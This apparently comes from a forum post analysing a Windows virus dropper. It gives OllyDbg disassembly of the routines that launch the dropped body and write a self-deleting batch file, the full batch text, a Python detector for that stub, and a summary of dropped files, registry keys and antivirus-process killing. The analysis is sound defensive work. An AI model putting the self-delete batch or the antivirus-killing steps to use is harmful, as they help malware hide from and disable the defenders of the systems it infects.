004010A3 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010A9 |. 68 24004100 PUSH 复件_123.00410024 ; /src = "xxggyu.exe"
004010AE |. 50 PUSH EAX ; |dest
004010AF |. E8 24050000 CALL <JMP.&MSVCRT.strcat> ; \strcat
004010B4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010BA |. 50 PUSH EAX
004010BB |. E8 E3010000 CALL 复件_123.004012A3
004010C0 |. 83C4 14 ADD ESP,14
004010C3 |. 85C0 TEST EAX,EAX
004010C5 |. 75 1A JNZ SHORT 复件_123.004010E1
004010C7 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010CD |. 50 PUSH EAX ; /String
004010CE |. FF15 50504000 CALL DWORD PTR DS:[<&KERNEL32.OutputDebu>; \OutputDebugStringA
004010D4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010DA |. 50 PUSH EAX
004010DB |. E8 20FFFFFF CALL 复件_123.00401000
004010E0 |. 59 POP ECX
004010E1 |> 68 C8000000 PUSH 0C8 ; /Timeout = 200. ms
004010E6 |. FF15 54504000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
004010EC |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010F2 |. 6A 01 PUSH 1 ; /ShowState = SW_SHOWNORMAL
004010F4 |. 50 PUSH EAX ; |CmdLine
004010F5 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec //
004010FB |. C9 LEAVE
004010FC \. C3 RETN
17. Drops a batch file that deletes the dropper itself, then exits
004040A4 /$ 55 PUSH EBP
004040A5 |. 8BEC MOV EBP,ESP
004040A7 |. 81EC 14090000 SUB ESP,914
004040AD |. 53 PUSH EBX
004040AE |. 56 PUSH ESI
004040AF |. 57 PUSH EDI
004040B0 |. 6A 40 PUSH 40
004040B2 |. 33DB XOR EBX,EBX
004040B4 |. 59 POP ECX
004040B5 |. 33C0 XOR EAX,EAX
004040B7 |. 8DBD EDFEFFFF LEA EDI,DWORD PTR SS:
004040BD |. 889D ECFEFFFF MOV BYTE PTR SS:,BL
004040C3 |. 889D ECF6FFFF MOV BYTE PTR SS:,BL
004040C9 |. F3:AB REP STOS DWORD PTR ES:
004040CB |. 66:AB STOS WORD PTR ES:
004040CD |. AA STOS BYTE PTR ES:
004040CE |. B9 FF010000 MOV ECX,1FF
004040D3 |. 33C0 XOR EAX,EAX
004040D5 |. 8DBD EDF6FFFF LEA EDI,DWORD PTR SS:
004040DB |. BE D4E24300 MOV ESI,复件_123.0043E2D4 ; ASCII "375O540.bat"
004040E0 |. F3:AB REP STOS DWORD PTR ES:
004040E2 |. 66:AB STOS WORD PTR ES:
004040E4 |. AA STOS BYTE PTR ES:
004040E5 |. 8D7D F4 LEA EDI,DWORD PTR SS:
004040E8 |. 8D85 ECFEFFFF LEA EAX,DWORD PTR SS:
004040EE |. A5 MOVS DWORD PTR ES:,DWORD PTR DS:[ES>
004040EF |. A5 MOVS DWORD PTR ES:,DWORD PTR DS:[ES>
004040F0 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
004040F5 |. 50 PUSH EAX ; |PathBuffer
004040F6 |. 53 PUSH EBX ; |hModule => NULL
004040F7 |. A5 MOVS DWORD PTR ES:,DWORD PTR DS:[ES>; |
004040F8 |. FF15 28504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004040FE |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
00404104 |. 68 C8E24300 PUSH 复件_123.0043E2C8 ; /String2 = "@echo off"
00404109 |. 50 PUSH EAX ; |String1
0040410A |. FF15 40504000 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00404110 |. 8B35 3C504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.lstrcat>; kernel32.lstrcatA
00404116 |. 6A 0A PUSH 0A
00404118 |. 5F POP EDI
00404119 |> 8D85 ECF6FFFF /LEA EAX,DWORD PTR SS:
0040411F |. 68 ACE24300 |PUSH 复件_123.0043E2AC ; ASCII "@echo 375O540>>575.aqq"
00404124 |. 50 |PUSH EAX
00404125 |. FFD6 |CALL ESI
00404127 |. 4F |DEC EDI
00404128 |.^ 75 EF \JNZ SHORT 复件_123.00404119
0040412A |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
00404130 |. 68 9CE24300 PUSH 复件_123.0043E29C ; ASCII "@del 575.aqq"
00404135 |. 50 PUSH EAX
00404136 |. FFD6 CALL ESI
00404138 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
0040413E |. 68 94E24300 PUSH 复件_123.0043E294 ; ASCII "@del ""
00404143 |. 50 PUSH EAX
00404144 |. FFD6 CALL ESI
00404146 |. 8D85 ECFEFFFF LEA EAX,DWORD PTR SS:
0040414C |. 50 PUSH EAX
0040414D |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
00404153 |. 50 PUSH EAX
00404154 |. FFD6 CALL ESI
00404156 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
0040415C |. 68 90E24300 PUSH 复件_123.0043E290 ; ASCII """
00404161 |. 50 PUSH EAX
00404162 |. FFD6 CALL ESI
00404164 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
0040416A |. 68 88E24300 PUSH 复件_123.0043E288 ; ASCII "@del "
0040416F |. 50 PUSH EAX
00404170 |. FFD6 CALL ESI
00404172 |. 8D45 F4 LEA EAX,DWORD PTR SS:
00404175 |. 50 PUSH EAX
00404176 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
0040417C |. 50 PUSH EAX
0040417D |. FFD6 CALL ESI
0040417F |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
00404185 |. 68 80E24300 PUSH 复件_123.0043E280 ; ASCII "@exit"
0040418A |. 50 PUSH EAX
0040418B |. FFD6 CALL ESI
0040418D |. 53 PUSH EBX ; /hTemplateFile
0040418E |. 53 PUSH EBX ; |Attributes
0040418F |. 6A 02 PUSH 2 ; |Mode = CREATE_ALWAYS
00404191 |. 53 PUSH EBX ; |pSecurity
00404192 |. 53 PUSH EBX ; |ShareMode
00404193 |. 8D45 F4 LEA EAX,DWORD PTR SS: ; |
00404196 |. 68 00000040 PUSH 40000000 ; |Access = GENERIC_WRITE
0040419B |. 50 PUSH EAX ; |FileName
0040419C |. FF15 5C504000 CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA
004041A2 |. 8BF0 MOV ESI,EAX
004041A4 |. 8D45 F0 LEA EAX,DWORD PTR SS:
004041A7 |. 53 PUSH EBX ; /pOverlapped
004041A8 |. 50 PUSH EAX ; |pBytesWritten
004041A9 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS: ; |
004041AF |. 68 00080000 PUSH 800 ; |nBytesToWrite = 800 (2048.)
004041B4 |. 50 PUSH EAX ; |Buffer
004041B5 |. 56 PUSH ESI ; |hFile
004041B6 |. FF15 68504000 CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; \WriteFile
004041BC |. 56 PUSH ESI ; /hObject
004041BD |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
004041C3 |. 8D45 F4 LEA EAX,DWORD PTR SS:
004041C6 |. 53 PUSH EBX ; /ShowState
004041C7 |. 50 PUSH EAX ; |CmdLine
004041C8 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec
004041CE |. 53 PUSH EBX ; /ExitCode
004041CF \. FF15 38504000 CALL DWORD PTR DS:[<&KERNEL32.ExitProces>; \ExitProcess
18. The contents of the batch file are as follows
@echo off
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@del 575.aqq
@del "C:\Documents and Settings\Robey\桌面\新建文件夹\复件 123.exe"
@del 375O540.bat
@exit
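A defender reading sections 17 and 18 mostly wants two things: to recognise this self-delete stub when it turns up in a triage folder, and to remember that the routine writes its whole 0x800-byte stack buffer with WriteFile, so the .bat on disk is exactly 2048 bytes with NUL padding after "@exit". The following Python is an added example, not code from the original post; the sample batch bytes are constructed from the listing in section 18 (the CRLF line endings are an assumption, since the OllyDbg string constants do not show them), and the function names are the example's own.

```python
import re
from typing import Dict, List

# Patterns for the two batch commands that matter in this stub. The dropper
# prefixes every line with "@" to suppress command echo, so "@" is optional here.
_DEL_RE = re.compile(r'^@?del\s+(?:"([^"]+)"|(\S+))\s*$', re.IGNORECASE)
_ECHO_APPEND_RE = re.compile(r'^@?echo\s+\S+\s*>>\s*(\S+)\s*$', re.IGNORECASE)


def batch_lines(data: bytes) -> List[str]:
    """Decode a dropped .bat into its non-empty command lines.

    The routine in section 17 passes nBytesToWrite = 0x800 to WriteFile, so the
    file carries trailing NUL bytes after the last command. Strip them before
    splitting, otherwise the final "@exit" line is not recognised.
    """
    text = data.rstrip(b"\x00").decode("utf-8", errors="replace")
    return [ln.strip() for ln in text.splitlines() if ln.strip()]


def analyze_self_delete_batch(data: bytes, bat_name: str) -> Dict[str, object]:
    """Classify a batch file as the self-delete stub used by this dropper.

    Signals, all visible in the reversed routine:
      * a run of "@echo <junk>>><tmpfile>" lines (the loop runs 10 times),
      * "@del" of that temp file,
      * "@del" of the dropper executable (quoted path),
      * "@del" of the batch file itself, followed by "@exit".
    """
    lines = batch_lines(data)
    deleted: List[str] = []
    echo_targets: List[str] = []
    for ln in lines:
        m = _DEL_RE.match(ln)
        if m:
            deleted.append(m.group(1) or m.group(2))
            continue
        m = _ECHO_APPEND_RE.match(ln)
        if m:
            echo_targets.append(m.group(1))

    deletes_self = any(d.lower() == bat_name.lower() for d in deleted)
    deleted_exes = [d for d in deleted if d.lower().endswith(".exe")]
    ends_with_exit = bool(lines) and lines[-1].lower() == "@exit"
    return {
        "line_count": len(lines),
        "echo_padding_lines": len(echo_targets),
        "deleted_paths": deleted,
        "deleted_exes": deleted_exes,
        "deletes_self": deletes_self,
        "scrubs_temp_file": any(t in deleted for t in echo_targets),
        "ends_with_exit": ends_with_exit,
        "is_self_delete_stub": deletes_self and bool(deleted_exes) and ends_with_exit,
    }


# Constructed sample: the batch text from section 18, encoded and NUL-padded to
# 0x800 bytes, which is what the 2048-byte WriteFile in section 17 leaves on disk.
SAMPLE_BAT_NAME = "375O540.bat"
SAMPLE_BAT = (
    b"@echo off\r\n"
    + b"@echo 375O540>>575.aqq\r\n" * 10
    + b"@del 575.aqq\r\n"
    + '@del "C:\\Documents and Settings\\Robey\\桌面\\新建文件夹\\复件 123.exe"\r\n'.encode("utf-8")
    + b"@del 375O540.bat\r\n"
    + b"@exit\r\n"
).ljust(0x800, b"\x00")


if __name__ == "__main__":
    report = analyze_self_delete_batch(SAMPLE_BAT, SAMPLE_BAT_NAME)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The 2048-byte file size and the NUL tail are useful forensic artefacts in their own right: a batch file that is exactly 0x800 bytes and ends in NULs rather than a newline was not written by a text editor.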
Summary:
1. Files created by the virus
This is a polymorphic virus: the dll files it drops differ on every run, but the dropped virus body always keeps the same name.
%SystemRoot%\system32\zrrs1.dll
%SystemRoot%\system32\dllcache\zrrs1.dll
%SystemRoot%\system32\iksii.dll (the dll that triggers a detection)
(The names of these three files are different after every run.)
%SystemRoot%\system32\xxggyu.exe (the dropped virus body)
D:\ssshall (attributes: read-only, hidden, system)
2. Registry entries modified by the virus
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Softfy
3. Virus analysis
An IE icon is added to the desktop pointing to http://www.wz157.cn. The virus creates registry entries, locks IE, drops files from itself into the system directory and sets their attributes to read-only, hidden and system. It enumerates processes looking for 360tray.exe and ravmond.exe (Rising) and kills them if found, hijacks the rundll32.exe process and continually requests outbound connections. Finally it drops a batch file from itself and deletes itself.
Cloud... I can't understand it.
Even though I can't understand it, I'm showing my support. Thanks for the hard work, OP!
Supporting the OP.
Reply to 正过来念是猪's post:
Cloud?? What??